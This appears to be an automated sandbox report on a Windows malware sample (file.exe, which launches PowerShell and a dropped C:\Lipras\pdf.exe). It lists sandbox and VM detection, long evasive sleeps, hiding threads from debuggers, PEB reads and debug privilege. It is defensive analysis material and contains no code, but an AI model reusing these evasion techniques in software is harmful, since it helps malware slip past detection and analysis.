Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Lipras\pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Lipras\pdf.exe System information queried: FirmwareTableInformation Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\file.exe Memory allocated: 9B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2300000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 4300000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598796 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598687 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598574 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598249 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598140 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598031 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597921 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597812 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597703 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597593 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597265 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597046 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596718 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596492 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596388 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596280 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596171 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596062 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595843 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595734 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595515 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595296 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595187 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595076 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 594968 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 594859 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 594750 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 594640 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 594531 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1829 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 8004 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7825 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1868 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5956 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3819 Jump to behavior
Source: C:\Lipras\pdf.exe Window / User API: threadDelayed 1154 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -36893488147419080s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -599671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -599562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -599453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -599343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -599234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -599125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -599015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -598906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -598796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -598687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -598574s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -598468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -598359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -598249s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -598140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -598031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -597921s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -597812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -597703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -597593s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -597484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -597375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -597265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -597156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -597046s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -596937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -596828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -596718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -596609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -596492s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -596388s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -596280s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -596171s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -596062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -595953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -595843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -595734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -595625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -595515s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -595406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -595296s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -595187s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -595076s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -594968s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -594859s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -594750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -594640s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820 Thread sleep time: -594531s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7496 Thread sleep count: 7825 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7496 Thread sleep count: 1868 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7588 Thread sleep count: 5956 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584 Thread sleep count: 3819 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Lipras\pdf.exe TID: 7984 Thread sleep count: 1154 > 30 Jump to behavior
Source: C:\Lipras\pdf.exe TID: 8004 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Lipras\pdf.exe TID: 8004 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Lipras\pdf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598796 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598687 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598574 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598249 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598140 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 598031 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597921 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597812 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597703 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597593 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597265 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 597046 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596718 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596492 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596388 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596280 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596171 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 596062 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595843 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595734 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595515 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595296 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595187 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 595076 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 594968 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 594859 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 594750 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 594640 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 594531 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: VBoxService.exe
Source: pdf.exe, 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: ~VirtualMachineTypes
Source: file.exe, 00000000.00000002.4143418545.0000000005895000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000081B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: pdf.exe, 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: VMWare
Source: pdf.exe, 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: &VBoxService.exe
Source: file.exe, 00000000.00000002.4139998465.00000000006F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Lipras\pdf.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Lipras\pdf.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Lipras\pdf.exe Code function: 7_2_00070D90 LdrInitializeThunk, 7_2_00070D90
Contains functionality to read the PEB
Source: C:\Lipras\pdf.exe Code function: 7_2_0263921D mov eax, dword ptr fs:[00000030h] 7_2_0263921D
Source: C:\Lipras\pdf.exe Code function: 7_2_02638F38 mov eax, dword ptr fs:[00000030h] 7_2_02638F38
Enables debug privileges
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug Jump to behavior
